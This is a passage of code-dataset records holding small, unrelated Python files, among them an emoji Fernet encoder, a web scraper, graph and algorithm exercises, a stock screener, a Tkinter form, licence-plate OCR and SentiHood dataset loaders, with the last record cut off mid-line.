+{"seq_id":"200173039","text":"import base64\nimport hashlib\nimport hmac\nimport zlib\n\nimport cryptography.fernet\n\n\nclass Emncojider(object):\n _digits = (\n '0123456789abcdef!?~=-%#ʘ/ΣĐ&Λ*Ψµᢵᣦᣌ'\n '😀😁😂😃😄😅😆😇😈😉😊😋😌😍😎😏'\n '😐😑😒😓😔😕😖😗😘😙😚😛😜😝😞😟'\n '😠😡😢😣😤😥😦😧😨😩😪😫😬😭😮😯'\n '😰😱😲😳😴😵😶😷😸😹😺😻😼😽😾😿'\n '🙀🙁🙂🙃🙄🙅🙆🙇🙈🙉🙊🙋🙌🙍🙎🙏'\n '🤐🤑🤒🤓🤔🤕🤖🤗🤘🤙🤚🤛🤜🤝🤞🤠'\n '🤡🤢🤣🤤🤥🤦🤧🤳🤴🤵🤶🤷🤸🤹🤺'\n '🤼🤽🤾🥀🥁🥂🥃🥄🥅🥇🥈🥉🥊🥋🥐'\n '🥑🥒🥔🥕🥖🥗🥘🥙🥚🥛🥜🥝🥞🦀🦁'\n '🏃🏄🏇🏊🏋👃👆💆💇💪🕴🕵🕺🖐🏂'\n '🦂🦃🦄🦅🦆🦇🦈🦉🦊🦋🦌🦍🦎🦏🦐🦑'\n '👇👈👉👊👋👌👍👎👏👐👦👧👨👩👮👰'\n '👱👲👳👴👵👶👷👸👼��💂💃💅⛽'\n '÷þ¿±¢$£¥×¡Δχ€‘’Ξᴥᴪᴣ'\n )\n assert 0x100 == len(_digits) == len(set(_digits))\n\n def __init__(self, key=None):\n if key == None:\n self._key = b'\\x00' * 32\n else:\n self._key = bytes(key)\n\n self._fernet = cryptography.fernet.Fernet(base64.urlsafe_b64encode(self._key))\n self._nonrandom_header_length = 9\n\n def encode(self, bs):\n compressed = zlib.compress(bs, level=9)\n safe_bytes = self._fernet.encrypt(compressed)\n fer_bytes = bytearray(base64.urlsafe_b64decode(safe_bytes))\n mask = hmac.new(self._key, fer_bytes[self._nonrandom_header_length:], hashlib.sha256).digest()\n for i in range(self._nonrandom_header_length):\n fer_bytes[i] ^= mask[i]\n return ''.join(self._digits[b] for b in fer_bytes)\n\n def decode(self, s):\n fer_bytes = bytearray(self._digits.index(c) for c in s)\n mask = hmac.new(self._key, fer_bytes[self._nonrandom_header_length:], hashlib.sha256).digest()\n for i in range(self._nonrandom_header_length):\n fer_bytes[i] ^= mask[i]\n safe_bytes = base64.urlsafe_b64encode(fer_bytes)\n compressed = self._fernet.decrypt(safe_bytes)\n return zlib.decompress(compressed)\n\n\nencode = Emncojider().encode\ndecode = Emncojider().decode\n","sub_path":"stackchat/_util/emncojiding.py","file_name":"emncojiding.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"427994654","text":"from urllib.request import Request, urlopen\n\nfrom bs4 import BeautifulSoup\n\nfrom collection import crawler\n\n\ndef ex01():\n request = Request(\"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\")\n response = urlopen(request)\n html = response.read().decode('cp949')\n # print(html)\n\n bs = BeautifulSoup(html, 'html.parser')\n divs = bs.findAll('div',attrs={'class':'tit3'})\n # print(len(divs))\n for index,div in enumerate(divs):\n print(index+1,div.a.text,div.a['href'],sep=':')\n\n\ndef print_error(e):\n print(e)\n\n\ndef ex02():\n html = crawler.crawling(url='https://movie.naver.com/movie/sdb/rank/rmovie.nhn',\n encoding='cp949')\n # print(html)\n\n bs = BeautifulSoup(html, 'html.parser')\n divs = bs.findAll('div',attrs={'class':'tit3'})\n # print(len(divs))\n for index,div in enumerate(divs):\n print(index+1,div.a.text,div.a['href'],sep=':')\n\n\n\nif __name__=='__main__':\n # ex01()\n ex02()","sub_path":"test/test_naver_movie_rank.py","file_name":"test_naver_movie_rank.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"438425784","text":"__author__ = 'zhy'\n\n\nclass Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n if s == None or len(s) == 0 or len(s.split()) == \" \":\n return \"\"\n res = \"\"\n words = s.split()\n for word in range(0, len(words)):\n if word == len(words) - 1:\n res += words[-1 - word]\n else:\n res += words[-1 - word] + ' '\n return res\n\n\ndef test():\n solu = Solution()\n s = \"hoe\"\n print(solu.reverseWords(s))\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"ReverseWords.py","file_name":"ReverseWords.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"18129878","text":"import datetime\nfrom olive.finance import database,tools,spider\n\n\n#连接数据库\nmydb=database.oliveMongoDB()\n\n#定义起始时间\nstart_date=datetime.datetime(2010,1,1)\nend_date=datetime.datetime.today()\n\n\n_all_money=25000;\n_rate=0.01\n_nday=20\n_shortday=20\n_longday=55\n\n\n#stock_list=spider.changeChinaStockCodeToYahoo(mydb.getData('stocklist',{'country':'China' },'code'))\n#stock_list=spider.changeChinaStockCodeToYahoo(mydb.getData('stocklist',{'code':'AMZN' },'code'))\n#stock_list=mydb.getData('stocklist',{'code':'AMZN' },'code')\nstock_list=mydb.getData('stocklist',{'country':'US' },'code')\n#print(stock_list)\n_list=[]\nfor stock in stock_list:\n\n\t#monogodb的查询语法\n\tdata_list=mydb.getData('stockday',{\"code\":stock['code'],\"Date\": {\"$gte\": start_date,\"$lte\":end_date}},'Date')\n\n\tif len(data_list)== 0:\n\t\tprint(\"Data record is Empty!\")\n\t\tcontinue;\n\telse:\n\t\tprint(\"Record Num : \"+str(len(data_list)))\n\n\tprint('#'*80)\n\tlast_price=float(data_list[-1]['Close'])\n\tlast_high_price=float(data_list[-1]['High'])\n\tlast_low_price=float(data_list[-1]['Low'])\n\n\tN=tools.ATR(tools.TR(data_list),_nday)[-1]\n\tif N==0:\n\t\tposition=_all_money/last_price\n\telse:\n\t\tposition=_all_money*_rate/N\n\n\tprint(\"Code:{0} Start:{1} End:{2}\".format(stock['code'],start_date.strftime('%Y-%m-%d'),end_date.strftime('%Y-%m-%d')))\n\tprint(\"ART:{:.4f}\".format(N))\n\tprint(\"Max Position Sizing:{0}\".format(int(position)))\n\t\n\n\tprint(\"Date:{0}\".format(data_list[-1]['Date'].strftime('%Y-%m-%d')))\n\tprint(\"Price:{0}\".format(last_price))\n\tprint(\"Stop Price:{:.2f}\".format(last_price-2*N))\n\n\thighlowpriceshort=tools.getLastHighAndLowPrice(data_list,_shortday)\n\thighlowpricelong=tools.getLastHighAndLowPrice(data_list,_longday)\n\tcrossshort=max(last_price,last_high_price)==highlowpriceshort[0] or min(last_price,last_low_price)==highlowpriceshort[1]\n\tcrosslong=max(last_price,last_high_price)==highlowpricelong[0] or min(last_price,last_low_price)==highlowpricelong[1]\n\n\tprint(\"20dH:{0} 20dL:{1} Cross:{2}\".format(highlowpriceshort[0],highlowpriceshort[1],crossshort))\n\tprint(\"55dH:{0} 55dL:{1} Cross:{2}\".format(highlowpricelong[0],highlowpricelong[1],crosslong))\n\n\tif crossshort or crosslong:\n\t\t_list.append(stock['code'])\n\nprint('#'*80)\nprint(_list)\nprint(\"All Stock Number:{0}\".format(len(stock_list)))\nprint(\"Seaturtle Number:{0}\".format(len(_list)))\nmydb.close()","sub_path":"Seaturtle.py","file_name":"Seaturtle.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110451302","text":"import networkx as nx\nimport matplotlib.pyplot as plt \n\nclass Queue:\n def __init__(self):\n self.q = []\n\n def enqueue(self,obj): #dodanie elementu do kolejki\n self.q.append(obj)\n\n def dequeue(self): #zdjęcie i zwrócenie elementu z kolejki\n if len(self.q)>0:\n return self.q.pop(0)\n else:\n return None\n\n def empty(self): #zwraca True gdy kolejka pusta\n if len(self.q)>0:\n return False\n else:\n return True\n\ndef BFS(lista_sas,odwiedzone,start,krotki):\n kolejka = Queue()\n kolejka.enqueue(start)\n odwiedzone[start] = True\n print(start)\n\n while not kolejka.empty():\n wierzch = kolejka.dequeue()\n sasiedzi = lista_sas[wierzch]\n\n for x in sasiedzi:\n if not odwiedzone[x]:\n krotki.append((wierzch, x)) ###\n odwiedzone[x] = True\n kolejka.enqueue(x)\n print(x)\n return krotki ###\n\nlista_sas = [[2, 4], [3, 4, 5, 6, 8],\n [0, 8], [1, 6, 8], [0, 1],\n [1], [1, 3], [8], [1, 2, 3, 7]]\nkrotki = []\nodwiedzone = len(lista_sas) * [False]\nkrotki = BFS(lista_sas, odwiedzone, 0, krotki)\nprint(krotki)\n\nG = nx.Graph()\nnodes = [0,1,2,3,4,5,6,7,8]\nG.add_nodes_from(nodes)\nfor x in krotki:\n G.add_edge(x[0], x[1])\n \nnx.draw(G,with_labels = True)\nplt.savefig(\"simple_path.png\")\nplt.show()\n\n\n\n\n\n\n\n","sub_path":"zadania2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10988272","text":"# Karatsuba Algorithm\n# Written by Alondra Pereira\n# Implementation based on video \"1 3 Karatsuba Multiplication 13 min\" by Stanford Algorithms\n# Link -> https://www.youtube.com/watch?v=JCbZayFr9RE\n\nimport random\n\n# Params:\n# x = first integer\n# y = second integer\n# base = base 10\n\ndef karatsuba(x, y, base=10):\n # Base case: If one of the two integers has only one digit, multiply them.\n str_x = str(x)\n str_y = str(y)\n if len(str_x) == 1 or len(str_y) == 1:\n return x * y\n else:\n # Sets n to the integer with the most digits.\n n = max(len(str_x), len(str_y))\n half_of_n = n // 2\n a = x // (base ** half_of_n)\n b = x % (base ** half_of_n)\n c = y // (base ** half_of_n)\n d = y % (base ** half_of_n)\n # Recursively computes ac and bd\n ac = karatsuba(a, c)\n bd = karatsuba(b, d)\n # Calculates ad + bc using the Gaussian Trick [(a+b)(c+d) - bd - ac = ad + bc)]\n ad_plus_bc = karatsuba(a + b, c + d) - bd - ac\n # Returns final result using (10ˆn/2)(ac) + (10ˆn/2)(ad + bc) + bd\n return ((base ** (half_of_n*2)) * ac) + ((base ** half_of_n) * ad_plus_bc) + bd\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n for i in range(5):\n x = random.randint(1, 4000)\n print(\"x = \", x)\n y = random.randint(1, 4000)\n print(\"y = \", y)\n res = karatsuba(x, y)\n print(\"Result= \", res)\n assert res == x * y\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433176396","text":"import math\nimport torch.nn as nn\nimport torch\n\ndef spatial_pyramid_pool(previous_conv, num_sample, previous_conv_size, out_pool_size):\n '''\n previous_conv: a tensor vector of previous convolution layer\n num_sample: an int number of image in the batch\n previous_conv_size: an int vector [height, width] of the matrix features size of previous convolution layer\n out_pool_size: a int vector of expected output size of max pooling layer\n \n returns: a tensor vector with shape [1 x n] is the concentration of multi-level pooling\n ''' \n for i in range(len(out_pool_size)):\n h_wid = math.ceil(previous_conv_size[0] / out_pool_size[i])\n w_wid = math.ceil(previous_conv_size[1] / out_pool_size[i]) # kernel_size(int or tuple) - max pooling的窗口大小\n h_pad = min(math.floor((h_wid*out_pool_size[i] - previous_conv_size[0] + 1)/2),math.floor(h_wid/2))\n w_pad = min(math.floor((w_wid*out_pool_size[i] - previous_conv_size[1] + 1)/2),math.floor(w_wid/2)) # padding(int or tuple, optional) - 输入的每一条边补充0的层数\n # 以上的计算就是为了解决无论取出来的region_proposal大小如何,最终经过maxpool后的大小都是一致的\n maxpool = nn.MaxPool2d((h_wid, w_wid), stride=(h_wid, w_wid), padding=(h_pad, w_pad))\n x = maxpool(previous_conv) # [1, 512, 2, 2]后面两维是out_pool_size\n # print(\"x shape:\", x.shape)\n if x.shape[2] == 1:\n x = torch.cat((x, x), 2)\n elif x.shape[3] == 1:\n x = torch.cat((x, x), 3)\n m = x.view(num_sample,-1)\n if(m.size(1) != 2048):\n continue\n if(i == 0):\n spp = x.view(num_sample,-1)\n # print(\"spp0 size:\",spp.size())\n else:\n spp = torch.cat((spp,x.view(num_sample,-1)), 1)\n # print(\"spp1 size:\", spp.size())\n return spp\n","sub_path":"model/spp_layer.py","file_name":"spp_layer.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352046331","text":"#12. Write a program which accept number from user and return number of digits in that number.\r\n\r\ndef fun(num):\r\n sum=0\r\n while (num!=0):\r\n num=num//10\r\n sum=sum+1\r\n print(\"Number of digits :\",sum)\r\n\r\nif __name__ == \"__main__\":\r\n fun(num=int(input(\"Enter number : \")))\r\n","sub_path":"Python Basics/Assignment12.py","file_name":"Assignment12.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109124857","text":"# 简单的装饰器,确保函数接受的所有参数都是整形,否则报错\r\n\r\n\r\ndef requires_ints(func):\r\n def inner(*args,**kwargs):\r\n # 取得关键字的值\r\n kwarg_values = [i for i in kwargs.values()]\r\n print(args) #(3,5)\r\n print(kwargs.values()) # dict_values([])\r\n for arg in (list(args) + kwarg_values):\r\n if not isinstance(arg,int):\r\n raise TypeError('%s only accepts integers as arguments (只能接受整数).' % func.__name__)\r\n return func(*args,**kwargs)\r\n return inner\r\n\r\n\r\n@requires_ints\r\ndef foo(x,y):\r\n return x+y\r\n\r\n\r\nprint(help(foo)) #inner(*args, **kwargs)\r\n\r\na = foo(3,5)\r\nprint(a) # 8\r\n\r\n\r\nb = foo(3,'haha')\r\nprint(b)\r\n\r\n# raise TypeError('%s only accepts integers as arguments (只能接受整数).' % func.__name__)\r\n# TypeError: foo only accepts integers as arguments (只能接受整数).","sub_path":"装饰器/类型检查.py","file_name":"类型检查.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195101212","text":"from tkinter import*\nimport tkinter.messagebox as message_box\nfrom tkinter import ttk\nimport sqlite3\n\n\nroot = Tk()\nroot.title(\"Calendar Options Form\")\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\nwidth = 900\nheight = 500\nx = (screen_width/2) - (width/2)\ny = (screen_height/2) - (height/2)\nroot.geometry('%dx%d+%d+%d' % (width, height, x, y))\nroot.resizable(0, 0)\n\n\n\n# ---- Variables ----\nlistbox_headers = ('RequestID', 'Date', 'Signed Off')\n\n\n# test data\nrequest_id = 1234\nemp_id = 1100\nleave_date = \"13/06/19\"\nsubmission_date = \"03/05/19\"\nleave_type = \"Holiday\"\nemp_comment = \"I am going on holiday\"\nsigned_off = \"No\"\nmgr_comment = \"All employees must attend on this date\"\nmgr_name = \"Steven Tasks\"\ndate_name = \"TestHoliday\"\ndate_to_remove = \"01/02/19\"\n\n# ---- Methods ----\n\n\ndef add_date():\n\n date_name_to_add = txt_date_name.get(\"1.0\", END)\n date_to_add = \"DATE\"\n\n result = message_box.askquestion(\"Add date\", \"Are you sure you want to add bank holiday ''\" + str(date_name_to_add) + \"'' on \" + str(date_to_add) + \"?\", icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", str(txt_date_name) + \"has been successfully added!\")\n print(\"New holiday ''\" + str(date_name_to_add) + \"'' on \" + str(date_to_add) + \" added by \" + mgr_name)\n else:\n print(\"New Holiday Date creation canceled\")\n\n\ndef remove_date():\n date_name_to_remove = \"DATE_NAME\"\n date_to_remove = \"DATE\"\n\n result = message_box.askquestion(\"Add date\",\n \"Are you sure you want to remove bank holiday ''\" + str(date_name_to_remove) + \"'' on \" + str(date_to_remove) + \"?\",\n icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", date_name_to_remove + \"has been successfully removed.\")\n print(\"''\" + str(date_name_to_remove) + \"'' on \" + str(date_to_remove) + \" removed by \" + mgr_name)\n else:\n print(\"Holiday Date deletion canceled\")\n\n\ndef remove_all_bank_holidays():\n\n result = message_box.askquestion(\"Remove All Bank Holidays\", \"Are you sure you want to remove ALL bank holidays from the calendar?\", icon='warning')\n\n if result == 'yes':\n message_box.showinfo(\"\", \"All Bank Holidays Removed\")\n print(\"All Bank Holidays Removed by \" + mgr_name)\n else:\n print(\"All Bank Holiday Removal Canceled\")\n\n\n# ---- Frame ----\n\n\nfraBankHol = Frame(root, width=900, height=150, relief=\"raise\")\nfraBankHol.pack(side=TOP, anchor=N)\n\nfraAddRemove = Frame(root, width=900, height=200, relief=\"raise\")\nfraAddRemove.pack(side=TOP, anchor=N, fill=BOTH)\n\nfraAddDate = Frame(fraAddRemove, width=350, height=200, bd=6, relief=\"raise\")\nfraAddDate.pack(side=LEFT, anchor=CENTER)\n\nfraAddDate.grid_rowconfigure(0, weight=0)\nfraAddDate.grid_columnconfigure(0, weight=0)\n\nfraRemoveDate = Frame(fraAddRemove, width=350, height=200, bd=6, relief=\"raise\")\nfraRemoveDate.pack(side=RIGHT, anchor=CENTER)\n\nfraRemoveDate.grid_rowconfigure(0, weight=0)\nfraRemoveDate.grid_columnconfigure(0, weight=0)\n\nfraAnualRollover = Frame(root, width=900, height=150, relief=\"raise\")\nfraAnualRollover.pack(side=TOP, anchor=N)\n\nfraAnualRollover.grid_rowconfigure(0, weight=0)\nfraAnualRollover.grid_columnconfigure(0, weight=0)\n\n\n# ---- Labels ---- #\n\nlbl_bankhol = Label(fraBankHol, justify=LEFT, anchor=W, width=100, font=('Arial', 20), text=\"Bank Holiday Date Options\")\nlbl_bankhol.pack()\n\nlbl_add_date = Label(fraAddDate, justify=LEFT, anchor=W, width=10, font=('Arial', 15), text=\"Add Date\")\nlbl_add_date.grid(column=0, row=0)\n\nlbl_adddate_date = Label(fraAddDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Date:\")\nlbl_adddate_date.grid(column=0, row=1)\n\nlbl_adddate_name = Label(fraAddDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Name:\")\nlbl_adddate_name.grid(column=0, row=2)\n\nlbl_remove_date = Label(fraRemoveDate, justify=LEFT, anchor=W, width=15, font=('Arial', 15), text=\"Remove Date\")\nlbl_remove_date.grid(column=0, row=0)\n\nlbl_removedate_date = Label(fraRemoveDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Date:\")\nlbl_removedate_date.grid(column=0, row=1)\n\nlbl_removedate_name = Label(fraRemoveDate, justify=LEFT, anchor=W, width=5, font=('Arial', 18), text=\"Name:\")\nlbl_removedate_name.grid(column=0, row=2)\n\nlbl_removedate_name_actual = Label(fraRemoveDate, justify=LEFT, anchor=W, width=20, font=('Arial', 18), text=date_name)\nlbl_removedate_name_actual.grid(column=1, row=2)\n\nlbl_anual_rollover = Label(fraAnualRollover, justify=LEFT, anchor=W, width=60, font=('Arial', 20), text=\"Anual Rollover Options\")\nlbl_anual_rollover.grid(column=0, row=0, columnspan=20)\n\nlbl_num_days = Label(fraAnualRollover, justify=LEFT, anchor=W, width=40, font=('Arial', 16), text=\"Number of leave days to roll over to the next year:\")\nlbl_num_days.grid(column=0, row=1)\n\nufix_logo = PhotoImage(file=\"UfixLogo.png\")\npic_ufix_logo = Label(fraAnualRollover, anchor=S, justify=RIGHT, image=ufix_logo)\n\npic_ufix_logo.grid(row=0, column=5, rowspan=2)\n\n# ---- Checkboxes ---- #\nchk_online_dates = Checkbutton(fraBankHol, font=('Arial', 16), text=\"Automatically get Bank Holiday dates from the internet\")\nchk_online_dates.pack(anchor=W)\n\n# ---- Spinbox ---- #\nspn_num_days = ttk.Spinbox(fraAnualRollover, from_=0, to=30)\nspn_num_days.grid(column=1, row=1)\n\n# --- Comboboxes ---- #\n\ncmb_date_picker = ttk.Combobox(fraAddDate, width=20, font=('Arial', 18))\ncmb_date_picker['values'] = \"peekaboo\"\ncmb_date_picker.grid(row=1, column=1)\n\ncmb_remove_date = ttk.Combobox(fraRemoveDate, width=20, font=('Arial', 18))\ncmb_remove_date['values'] = \"peekaboo\"\ncmb_remove_date.grid(row=1, column=1)\n\n# ---- TextBox ---- #\n\ntxt_date_name = Text(fraAddDate, width=20, height=1, font=('Arial', 18))\ntxt_date_name.grid(row=2, column=1, rowspan=2, pady=1)\n\n# ---- Buttons ---- #\n\nbtn_removeAllBankHol = Button(fraBankHol, width=23, font=('Arial', 18), text=\"Remove All Bank Holiday Dates\", padx=20, command=remove_all_bank_holidays)\nbtn_removeAllBankHol.pack()\n\nbtn_addDate = Button(fraAddDate, width=10, font=('Arial', 18), text=\"Add\", padx=20, command=add_date)\nbtn_addDate.grid(row=5, column=1)\n\nbtn_removeDate = Button(fraRemoveDate, width=10, font=('Arial', 18), text=\"Delete\", padx=20, command=remove_date)\nbtn_removeDate.grid(row=5, column=1)\n\n\n# ---- Initialization ---- #\n\n# Works like Form.Load in C#\nif __name__ == '__main__':\n\n root.mainloop()\n","sub_path":"CalendarOptionsForm.py","file_name":"CalendarOptionsForm.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269717418","text":"# This file is part of the OpenProtein project.\n#\n# @author Jeppe Hallgren\n#\n# For license information, please see the LICENSE file in the root directory.\nfrom util import *\nimport time\nimport torch.nn.utils.rnn as rnn_utils\nimport torch.nn as nn\n\nclass BaseModel(nn.Module):\n def __init__(self, use_gpu, embedding_size):\n super(BaseModel, self).__init__()\n\n # initialize model variables\n self.use_gpu = use_gpu\n self.embedding_size = embedding_size\n\n def get_embedding_size(self):\n return self.embedding_size\n\n def embed(self, original_aa_string):\n data, batch_sizes = torch.nn.utils.rnn.pad_packed_sequence(\n torch.nn.utils.rnn.pack_sequence(original_aa_string))\n\n # one-hot encoding\n start_compute_embed = time.time()\n prot_aa_list = data.unsqueeze(1)\n embed_tensor = torch.zeros(prot_aa_list.size(0), 21, prot_aa_list.size(2)) # 21 classes\n if self.use_gpu:\n prot_aa_list = prot_aa_list.cuda()\n embed_tensor = embed_tensor.cuda()\n input_sequences = embed_tensor.scatter_(1, prot_aa_list.data, 1).transpose(1,2)\n end = time.time()\n write_out(\"Embed time:\", end - start_compute_embed)\n packed_input_sequences = rnn_utils.pack_padded_sequence(input_sequences, batch_sizes)\n return packed_input_sequences\n\n def forward(self, original_aa_string):\n return self._get_network_emissions(original_aa_string)","sub_path":"openprotein.py","file_name":"openprotein.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440727555","text":"import cv2\r\nimport imutils #for resizing images\r\nimport pytesseract\r\n\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files (x86)\\Tesseract-OCR\\tesseract\"\r\n\r\nimage=cv2.imread('b.jpg') #reading the image file\r\nimage=imutils.resize(image, width=500\r\n )\r\n\r\ncv2.imshow(\"Original Image\",image)\r\n\r\n\r\ngray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\r\ncv2.imshow(\"Gray Scale Image\",gray)\r\n\r\n\r\ngray=cv2.bilateralFilter(gray,11,17,17)\r\ncv2.imshow(\"Smoother Image\",gray)\r\n\r\n\r\nedged=cv2.Canny(gray,170,200)\r\ncv2.imshow(\"Canny edge\",edged)\r\n\r\n\r\ncnts,new = cv2.findContours(edged.copy(),cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\r\nimage1=image.copy()\r\ncv2.drawContours(image1,cnts,-1,(0,255,0),3)\r\ncv2.imshow(\"Canny after contouring\",image1)\r\n\r\n\r\ncnts=sorted(cnts, key=cv2.contourArea, reverse=True)[:50]\r\nNumberPlateCount=None\r\n\r\nimage2= image.copy()\r\ncv2.drawContours(image2,cnts,-1,(0,255,0),3)\r\ncv2.imshow(\"Top 50 contours\",image2)\r\n\r\n\r\ncount = 0\r\nname = 1\r\n\r\nfor i in cnts:\r\n perimeter=cv2.arcLength(i,True)\r\n approx = cv2.approxPolyDP(i,0.02*perimeter,True)\r\n if(len(approx)==4):\r\n NumberPlateCount = approx\r\n x,y,w,h = cv2.boundingRect(i)\r\n crp_img = image[y:y+h, x:x+w]\r\n cv2.imwrite(str(name)+'.png',crp_img)\r\n\r\n name = name + 1\r\n break\r\ncv2.drawContours(image,[NumberPlateCount],-1,(0,255,0),3)\r\ncv2.imshow(\"Final Image\",image)\r\n\r\n\r\ncrop_img_loc=\"1.png\"\r\ncv2.imshow(\"Cropped Image\", cv2.imread(crop_img_loc))\r\ntext=\"\"\r\ntext=pytesseract.image_to_string(crop_img_loc,lang='eng')\r\nprint(\"Number is:\",text)\r\ncv2.waitKey(0)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555775671","text":"# Reference: https://github.com/liufly/delayed-memory-update-entnet\n\nfrom __future__ import absolute_import\n\nimport json\nimport operator\nimport os\nimport re\nimport sys\nimport xml.etree.ElementTree\n\nimport nltk\nimport numpy as np\n\n\n\ndef load_task(data_dir, aspect2idx):\n in_file = os.path.join(data_dir, 'sentihood-train.json')\n (train_labelled,train_unlabelled,aspect_count_tr) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-dev.json')\n (dev_labelled,dev_unlabelled,aspect_count_dv) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-test.json')\n (test_labelled,test_unlabelled,aspect_count_test) = parse_sentihood_json(in_file) \n extract_label(in_file)\n return (train_labelled,train_unlabelled,aspect_count_tr),(dev_labelled,dev_unlabelled,aspect_count_dv),(test_labelled,test_unlabelled,aspect_count_test)\n\n\"\"\" def load_task(data_dir, aspect2idx):\n in_file = os.path.join(data_dir, 'sentihood-train.json')\n (train_labelled,train_unlabelled) = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-dev.json')\n dev = parse_sentihood_json(in_file)\n in_file = os.path.join(data_dir, 'sentihood-test.json')\n test = parse_sentihood_json(in_file) \n \n train_labelled = convert_input(train_labelled, aspect2idx)\n train_aspect_idx = get_aspect_idx(train_labelled, aspect2idx)\n train_labelled = tokenize(train_labelled)\n #----------------------------------------\n train_unlabelled = convert_input(train_unlabelled, aspect2idx)\n train_aspect_idx = get_aspect_idx(train_unlabelled, aspect2idx)\n train_unlabelled = tokenize(train_unlabelled)\n dev = convert_input(dev, aspect2idx)\n dev_aspect_idx = get_aspect_idx(dev, aspect2idx)\n dev = tokenize(dev)\n test = convert_input(test, aspect2idx)\n test_aspect_idx = get_aspect_idx(test, aspect2idx)\n test = tokenize(test) \n\n #return (train, train_aspect_idx), (dev, dev_aspect_idx), (test, test_aspect_idx)\n return (train_labelled,train_unlabelled,train_aspect_idx) \"\"\"\n\n\n\"\"\" def get_aspect_count(aspect):\n aspect_freq={}\n if aspect in aspect_freq.keys():\n aspect_freq[aspect]+=1\n else:\n aspect_freq[aspect]=1 \"\"\"\n\ndef extract_label(in_file):\n with open(in_file) as f:\n data = json.load(f)\n test_set=[]\n test_labels=[]\n for d in data:\n text = d['text']\n opinions = []\n aspect=''\n for opinion in d['opinions']:\n aspect = opinion['aspect']\n if len(d['opinions'])!=0:\n test_set.append((text,aspect))\n test_labels.append(aspect)\n print('No. of data in test set: ',len(test_set),len(test_labels))\n out=open(\"test data_labels/test_set.txt\", \"w\", encoding='utf-8')\n out.write(str(test_set))\n with open(\"test data_labels/test_labels.txt\", \"w\", encoding='utf-8') as out:\n out.write(\"\\n\".join(str(i) for i in test_labels))\n return None\n\n\ndef get_aspect_idx(data, aspect2idx):\n ret = []\n for _, _, _, aspect, _ in data:\n ret.append(aspect2idx[aspect])\n assert len(data) == len(ret)\n return np.array(ret)\n\n\ndef parse_sentihood_json(in_file):\n with open(in_file) as f:\n data = json.load(f)\n\n review_text_labelled=[] #added to collect only the text -Sudeshna\n review_text_unlabelled=[]\n test_labels=[]\n \n ret = []\n unlabelled_ret=[]\n aspect_freq={}\n\n for d in data:\n text = d['text']\n sent_id = d['id']\n opinions = []\n targets = set()\n for opinion in d['opinions']:\n sentiment = opinion['sentiment']\n aspect = opinion['aspect']\n if aspect in aspect_freq.keys(): #to calculate aspect frequency\n aspect_freq[aspect]+=1\n else:\n aspect_freq[aspect]=1\n target_entity = opinion['target_entity']\n targets.add(target_entity)\n opinions.append((target_entity, aspect, sentiment))\n if len(d['opinions'])!=0:\n ret.append((sent_id, text, opinions))\n review_text_labelled.append(text)\n else:\n unlabelled_ret.append((sent_id, text, opinions))\n review_text_unlabelled.append(text)\n #return ret,unlabelled_ret\n print(review_text_labelled[:3])\n return review_text_labelled, review_text_unlabelled,aspect_freq #using only review text to train ABAE model - Sudeshna\n\n\ndef convert_input(data, all_aspects):\n ret = []\n for sent_id, text, opinions in data:\n for target_entity, aspect, sentiment in opinions:\n if aspect not in all_aspects:\n continue\n ret.append((sent_id, text, target_entity, aspect, sentiment))\n assert 'LOCATION1' in text\n targets = set(['LOCATION1'])\n if 'LOCATION2' in text:\n targets.add('LOCATION2')\n for target in targets:\n aspects = set([a for t, a, _ in opinions if t == target])\n none_aspects = [a for a in all_aspects if a not in aspects]\n for aspect in none_aspects:\n ret.append((sent_id, text, target, aspect, 'None'))\n return ret\n\n\ndef tokenize(data):\n ret = []\n for sent_id, text, target_entity, aspect, sentiment in data:\n new_text = nltk.word_tokenize(text)\n new_aspect = aspect.split('-')\n ret.append((sent_id, new_text, target_entity, new_aspect, 